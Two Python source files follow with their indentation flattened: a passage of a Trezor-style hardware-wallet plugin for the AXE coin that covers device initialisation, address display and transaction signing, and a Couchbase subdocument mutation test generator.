self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "AXE Testnet" if constants.net.TESTNET else "AXE"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
subdoc_autotestgenerator.py
|
import queue
import copy
import json
import threading
from multiprocessing import Process
import couchbase.subdocument as SD
from membase.api.rest_client import RestConnection
from memcached.helper.data_helper import VBucketAwareMemcached
from lib.couchbase_helper.random_gen import RandomDataGenerator
from lib.couchbase_helper.subdoc_helper import SubdocHelper
from .subdoc_base import SubdocBaseTest
class SubdocAutoTestGenerator(SubdocBaseTest):
def setUp(self):
super(SubdocAutoTestGenerator, self).setUp()
self.prepopulate_data = self.input.param("prepopulate_data", False)
self.verify_data_without_paths = self.input.param("verify_data_without_paths", True)
self.number_of_arrays = self.input.param("number_of_arrays", 1)
self.verbose_func_usage = self.input.param("verbose_func_usage", False)
self.nesting_level = self.input.param("nesting_level", 0)
self.mutation_operation_type = self.input.param("mutation_operation_type", "any")
self.force_operation_type = self.input.param("force_operation_type", None)
self.run_data_verification = self.input.param("run_data_verification", True)
self.prepopulate_item_count = self.input.param("prepopulate_item_count", 10000)
self.seed = self.input.param("seed", 0)
self.run_mutation_mode = self.input.param("run_mutation_mode", "seq")
self.client = self.direct_client(self.master, self.buckets[0])
self.build_kv_store = self.input.param("build_kv_store", False)
self.total_writer_threads = self.input.param("total_writer_threads", 10)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
self.randomDataGenerator = RandomDataGenerator()
self.subdoc_gen_helper = SubdocHelper()
self.kv_store = {}
self.load_thread_list = []
if self.prepopulate_data:
self.run_sync_data()
def tearDown(self):
super(SubdocAutoTestGenerator, self).tearDown()
def test_readonly(self):
self.client = self.direct_client(self.master, self.buckets[0])
error_result = {}
data_set = self.generate_json_for_nesting()
base_json = self.generate_json_for_nesting()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_readonly"
self.set(self.client, data_key, json_document)
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
data = self.get(self.client, key=data_key, path=path)
if data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
self.assertTrue(len(error_result) == 0, error_result)
def test_exists(self):
self.client = self.direct_client(self.master, self.buckets[0])
error_result = {}
data_set = self.generate_json_for_nesting()
base_json = self.generate_json_for_nesting()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_readonly"
self.set(self.client, data_key, json_document)
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
try:
self.exists(self.client, data_key, path, xattr=self.xattr)
except Exception as ex:
error_result[path] = str(ex)
self.assertTrue(len(error_result) == 0, error_result)
def test_seq_mutations_dict(self):
self.mutation_operation_type = "dict"
self.test_seq_mutations()
def test_seq_mutations_array(self):
self.mutation_operation_type = "array"
self.test_seq_mutations()
def test_multi_seq_mutations(self):
self.verify_result = self.input.param("verify_result", False)
        failure_queue = queue.Queue()
number_of_times = (self.number_of_documents // self.concurrent_threads)
process_list = []
number_of_buckets = len(self.buckets)
for x in range(self.concurrent_threads):
base_json = self.generate_json_for_nesting()
data_set = self.generate_nested(base_json, base_json, 2)
json_document = self.generate_nested(base_json, data_set, 10)
bucket_number = x % number_of_buckets
prefix = self.buckets[bucket_number].name + "_" + str(x) + "_"
            p = Process(target=self.test_seq_mutations,
                        args=(failure_queue, number_of_times, prefix, json_document, self.buckets[bucket_number]))
p.start()
process_list.append(p)
for p in process_list:
p.join()
if self.verify_result:
filename = "/tmp/" + self.randomDataGenerator.random_uuid() + "_dump_failure.txt"
queue_size = queue.qsize()
if not queue.empty():
self._dump_data(filename, queue)
self.assertTrue(queue_size == 0, "number of failures {0}, check file {1}".format(queue.qsize(), filename))
def test_seq_mutations(self, queue, number_of_times, prefix, json_document, bucket):
client = self.direct_client(self.master, bucket)
for x in range(number_of_times):
self.number_of_operations = self.input.param("number_of_operations", 50)
data_key = prefix + self.randomDataGenerator.random_uuid()
self.set(client, data_key, json_document)
operations = self.subdoc_gen_helper.build_sequence_operations(json_document, self.number_of_operations,
seed=self.seed,
mutation_operation_type=self.mutation_operation_type,
force_operation_type=self.force_operation_type)
for operation in operations:
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(data_value)
function(client, data_key, operation["new_path_impacted_after_mutation_operation"], data_value)
except Exception as ex:
queue.put("bucket {0}, error {1}".format(bucket.name, str(ex)))
data = self.get_all(client, data_key)
error_result = None
if data != json_document:
error_result = "bucket {0}, expected {1}, actual = {2}".format(bucket.name, json_document, data)
if error_result != None:
queue.put(error_result)
def test_concurrent_mutations_dict(self):
self.mutation_operation_type = "dict"
self.test_concurrent_mutations()
def test_concurrent_mutations_array(self):
self.mutation_operation_type = "array"
self.test_concurrent_mutations()
def test_concurrent_mutations(self):
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json()
data_set = randomDataGenerator.random_json()
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
data_key = "test_concurrent_mutations"
self.run_mutation_concurrent_operations(self.buckets[0], data_key, json_document)
def run_mutation_concurrent_operations(self, bucket=None, document_key="", json_document={}):
client = self.direct_client(self.master, bucket)
self.number_of_operations = self.input.param("number_of_operations", 10)
# INSERT INTO COUCHBASE
self.set(client, document_key, json_document)
# RUN PARALLEL OPERATIONS
operations = self.subdoc_gen_helper.build_concurrent_operations(
json_document, self.number_of_operations, seed=self.seed,
mutation_operation_type=self.mutation_operation_type,
force_operation_type=self.force_operation_type)
# RUN CONCURRENT THREADS
thread_list = []
result_queue = queue.Queue()
self.log.info(" number of operations {0}".format(len(operations)))
for operation in operations:
client = self.direct_client(self.master, bucket)
t = Process(target=self.run_mutation_operation, args=(client, document_key, operation, result_queue))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
queue_data = []
while not result_queue.empty():
queue_data.append(result_queue.get())
self.assertTrue(len(queue_data) == 0, queue_data)
# CHECK RESULT IN THE END
json_document = copy.deepcopy(operations[len(operations) - 1]["mutated_data_set"])
pairs = {}
error_result = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
data = self.get(client, document_key, path)
if data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
self.assertTrue(len(error_result) == 0, error_result)
def run_mutation_operation(self, client, document_key, operation, result_queue):
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(data_value)
function(client, document_key, operation["new_path_impacted_after_mutation_operation"], data_value)
except Exception as ex:
self.log.info(str(ex))
result_queue.put({"error": str(ex), "operation_type": operation["subdoc_api_function_applied"]})
''' Generic Test case for running sequence operations based tests '''
def run_mutation_operations_for_situational_tests(self):
self.run_load_during_mutations = self.input.param("run_load_during_mutations", False)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.number_of_operations = self.input.param("number_of_operations", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
error_queue = queue.Queue()
document_info_queue = queue.Queue()
thread_list = []
# RUN INPUT FILE READ THREAD
document_push = threading.Thread(target=self.push_document_info,
args=(self.number_of_documents, document_info_queue))
document_push.start()
# RUN WORKER THREADS
for x in range(self.concurrent_threads):
t = Process(target=self.worker_operation_run, args=(
document_info_queue, error_queue, self.buckets[0], self.mutation_operation_type, self.force_operation_type))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
# ERROR ANALYSIS
error_msg = ""
error_count = 0
if not error_queue.empty():
# Dump Re-run file
            dump_file = open('/tmp/dump_failure.txt', 'w')
while not error_queue.empty():
error_count += 1
error_data = error_queue.get()
dump_file.write(json.dumps(error_data["error_result"]))
dump_file.close()
# Fail the test with result count
self.assertTrue(error_count == 0, "error count {0}".format(error_count))
''' Generic Test case for running sequence operations based tests '''
def test_mutation_operations(self):
self.run_load_during_mutations = self.input.param("run_load_during_mutations", False)
self.number_of_documents = self.input.param("number_of_documents", 10)
self.number_of_operations = self.input.param("number_of_operations", 10)
self.concurrent_threads = self.input.param("concurrent_threads", 10)
error_queue = queue.Queue()
document_info_queue = queue.Queue()
thread_list = []
# RUN INPUT FILE READ THREAD
document_push = threading.Thread(target=self.push_document_info,
args=(self.number_of_documents, document_info_queue))
document_push.start()
document_push.join()
self.sleep(2)
# RUN WORKER THREADS
for bucket in self.buckets:
for x in range(self.concurrent_threads * len(self.buckets)):
# use thread instead of process because Process did not return an updated error queue
t = threading.Thread(target=self.worker_operation_run, args=(
document_info_queue, error_queue, bucket, self.mutation_operation_type, self.force_operation_type))
t.start()
thread_list.append(t)
if self.run_load_during_mutations:
self.run_async_data()
for t in thread_list:
t.join()
for t in self.load_thread_list:
            if t is not None and t.is_alive():
                t.signal = False
# ERROR ANALYSIS
queue_size = error_queue.qsize()
filename = '/tmp/dump_failure_{0}.txt'.format(self.randomDataGenerator.random_uuid())
if not error_queue.empty():
self._dump_data(filename, error_queue)
self.assertTrue(queue_size == 0, "number of failures {0}, check file {1}".format(error_queue.qsize(), filename))
''' Generate Sample data for testing '''
def push_document_info(self, number_of_documents, document_info_queue):
for x in range(number_of_documents):
document_info = {}
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
document_info["document_key"] = self.randomDataGenerator.random_uuid() + "_key_" + str(x)
document_info["seed"] = randomDataGenerator.random_int()
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
document_info["json_document"] = json_document
document_info_queue.put(document_info)
''' Worker for sequence operations on JSON '''
def worker_operation_run(self,
queue,
error_queue,
bucket,
mutation_operation_type="any",
force_operation_type=None):
client = self.direct_client(self.master, bucket)
while not queue.empty():
document_info = queue.get()
document_key = document_info["document_key"]
json_document = document_info["json_document"]
seed = document_info["seed"]
logic, error_result = self.run_mutation_operations(client, bucket,
document_key=document_key, json_document=json_document,
seed=seed,
number_of_operations=self.number_of_operations,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
if not logic:
error_queue.put({"error_result": error_result, "seed": seed})
''' Method to run sequence operations for a given JSON document '''
def run_mutation_operations(self,
client,
bucket,
document_key="document_key",
json_document={},
seed=0,
number_of_operations=10,
mutation_operation_type="any",
force_operation_type=None):
original_json_copy = copy.deepcopy(json_document)
self.set(client, document_key, json_document)
self.log.info(" Test ON KEY :: {0}".format(document_key))
if self.run_mutation_mode == "seq":
operations = self.subdoc_gen_helper.build_sequence_operations(
json_document,
max_number_operations=number_of_operations,
seed=seed,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
# self.log.info("TOTAL OPERATIONS CALCULATED {0} ".format(len(operations)))
operation_index = 1
for operation in operations:
function = getattr(self, operation["subdoc_api_function_applied"])
try:
data_value = operation["data_value"]
if not self.use_sdk_client:
data_value = json.dumps(operation["data_value"])
function(client, document_key, operation["new_path_impacted_after_mutation_operation"], data_value)
operation_index += 1
except Exception as ex:
return False, operation
else:
logic, result = self.run_concurrent_mutation_operations(document_key, bucket, seed, json_document,
number_of_operations, mutation_operation_type,
force_operation_type)
            if not logic:
                return False, result
# self.log.info(" END WORKING ON {0}".format(document_key))
# json_document = operations[len(operations)-1]["mutated_data_set"]
        if self.build_kv_store and self.run_mutation_mode == "seq":
            self.kv_store[document_key] = operations[len(operations) - 1]["mutated_data_set"]
error_result = {}
if self.run_data_verification:
if self.verify_data_without_paths:
data = self.get_all(client, document_key)
if data != json_document:
error_result = "expected {0}, actual = {1}".format(json_document, data)
return False, error_result
else:
pairs = {}
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
# self.log.info(" Analyzing path {0}".format(path))
check_data = True
try:
data = self.get(client, document_key, path)
except Exception as ex:
check_data = False
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], str(ex))
self.print_operations(operations)
self.log.info("_______________________________________________")
self.log.info(" path in question {0} ".format(path))
self.log.info("ORIGINAL {0} ".format(original_json_copy))
self.log.info("EXPECTED {0} ".format(json_document))
self.log.info("ACTUAL {0} ".format(self.get_all(client, document_key)))
self.log.info("_______________________________________________")
return False, error_result
if check_data and data != pairs[path]:
error_result[path] = "expected {0}, actual = {1}".format(pairs[path], data)
if len(error_result) != 0:
return False, error_result
return True, error_result
def print_operations(self, operations):
index = 0
for operation in operations:
index += 1
self.log.info(" +++++++++++++++++++++++++ mutation # {0} +++++++++++++++++++++++++ ".format(index))
for k, v in operation.items():
self.log.info("{0} :: {1}".format(k, v))
def run_concurrent_mutation_operations(self, document_key, bucket, seed, json_document, number_of_operations,
mutation_operation_type, force_operation_type):
result_queue = queue.Queue()
operations = self.subdoc_gen_helper.build_concurrent_operations(
json_document,
max_number_operations=number_of_operations,
seed=seed,
mutation_operation_type=mutation_operation_type,
force_operation_type=force_operation_type)
self.log.info("TOTAL OPERATIONS CALCULATED {0} ".format(len(operations)))
thread_list = []
for operation in operations:
client = self.direct_client(self.master, bucket)
t = Process(target=self.run_mutation_operation, args=(client, document_key, operation, result_queue))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
if result_queue.empty():
return True, None
return False, result_queue
def run_sync_data(self):
self.load_thread_list = []
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
if self.prepopulate_data:
self.load_thread_list = []
for bucket in self.buckets:
for x in range(self.total_writer_threads):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
t = Process(target=self.run_populate_data_per_bucket, args=(
client, bucket, json_document, (self.prepopulate_item_count // self.total_writer_threads), x))
t.start()
self.load_thread_list.append(t)
for t in self.load_thread_list:
t.join()
def run_async_data(self):
self.load_thread_list = []
randomDataGenerator = RandomDataGenerator()
randomDataGenerator.set_seed(self.seed)
base_json = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
data_set = randomDataGenerator.random_json(random_array_count=self.number_of_arrays)
json_document = self.generate_nested(base_json, data_set, self.nesting_level)
if self.prepopulate_data:
self.load_thread_list = []
for bucket in self.buckets:
for x in range(self.total_writer_threads):
client = VBucketAwareMemcached(RestConnection(self.master), bucket)
t = Process(target=self.run_populate_data_per_bucket, args=(
client, bucket, json_document, (self.prepopulate_item_count // self.total_writer_threads), x))
t.start()
self.load_thread_list.append(t)
def run_populate_data_per_bucket(self, client, bucket, json_document, prepopulate_item_count, prefix):
for x in range(prepopulate_item_count):
key = str(prefix) + "_subdoc_" + str(x)
try:
client.set(key, 0, 0, json.dumps(json_document))
except Exception as ex:
self.log.info(ex)
def _dump_data(self, filename, queue):
target = open(filename, 'w')
        while not queue.empty():
data = queue.get()
target.write(data)
target.close()
''' Method to verify kv store data set '''
def run_verification(self, bucket, kv_store={}):
client = self.direct_client(self.master, bucket)
error_result = {}
for document_key in list(kv_store.keys()):
pairs = {}
json_document = kv_store[document_key]
self.subdoc_gen_helper.find_pairs(json_document, "", pairs)
for path in list(pairs.keys()):
opaque, cas, data = client.get_sd(document_key, path)
data = json.loads(data)
if data != pairs[path]:
error_result[path] = "key = {0}, expected {1}, actual = {2}".format(document_key, pairs[path], data)
        self.assertTrue(len(error_result) == 0, error_result)
# DOC COMMANDS
def set(self, client, key, value):
try:
if self.verbose_func_usage:
self.log.info(" set ----> {0} ".format(key))
if self.use_sdk_client:
client.set(key, value)
else:
jsonDump = json.dumps(value)
client.set(key, 0, 0, jsonDump)
except Exception:
raise
# SUB DOC COMMANDS
# GENERIC COMMANDS
def delete(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" delete ----> {0} ".format(path))
if self.use_sdk_client:
client.mutate_in(key, SD.remove(path, xattr=self.xattr))
else:
client.delete_sd(key, path)
except Exception:
raise
def replace(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" replace ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.replace(path, value, xattr=self.xattr))
else:
client.replace_sd(key, path, value)
except Exception:
raise
def get_all(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" get ----> {0} ".format(key))
if self.use_sdk_client:
r, v, d = client.get(key)
return d
else:
r, v, d = client.get(key)
return json.loads(d)
except Exception:
raise
def get(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" get ----> {0} :: {1}".format(key, path))
if self.use_sdk_client:
d = client.retrieve_in(key, path).get(0)[1]
return d
else:
r, v, d = client.get_sd(key, path)
return json.loads(d)
except Exception:
raise
def exists(self, client, key='', path='', value=None):
try:
if self.use_sdk_client:
client.lookup_in(key, SD.exists(path)) # xattr not supported?
else:
client.exists_sd(key, path)
except Exception:
raise
def counter(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" counter ----> {0} :: {1} + {2}".format(key, path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.counter(path, int(value), xattr=self.xattr))
else:
client.counter_sd(key, path, value)
except Exception:
raise
# DICTIONARY SPECIFIC COMMANDS
def dict_add(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" dict_add ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.insert(path, value, xattr=self.xattr))
else:
client.dict_add_sd(key, path, value)
except Exception:
raise
def dict_upsert(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" dict_upsert ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.upsert(path, value, xattr=self.xattr))
else:
client.dict_upsert_sd(key, path, value)
except Exception:
raise
# ARRAY SPECIFIC COMMANDS
def array_add_last(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_last ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_append(path, value, xattr=self.xattr))
else:
client.array_push_last_sd(key, path, value)
except Exception:
raise
def array_add_first(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_first ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_prepend(path, value, xattr=self.xattr))
else:
client.array_push_first_sd(key, path, value)
except Exception:
raise
def array_add_unique(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_unique ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_addunique(path, value, xattr=self.xattr))
else:
client.array_add_unique_sd(key, path, value)
except Exception:
raise
def array_add_insert(self, client, key='', path='', value=None):
try:
if self.verbose_func_usage:
self.log.info(" array_add_insert ----> {0} :: {1}".format(path, value))
if self.use_sdk_client:
client.mutate_in(key, SD.array_insert(path, value, xattr=self.xattr))
else:
client.array_add_insert_sd(key, path, value)
except Exception:
raise
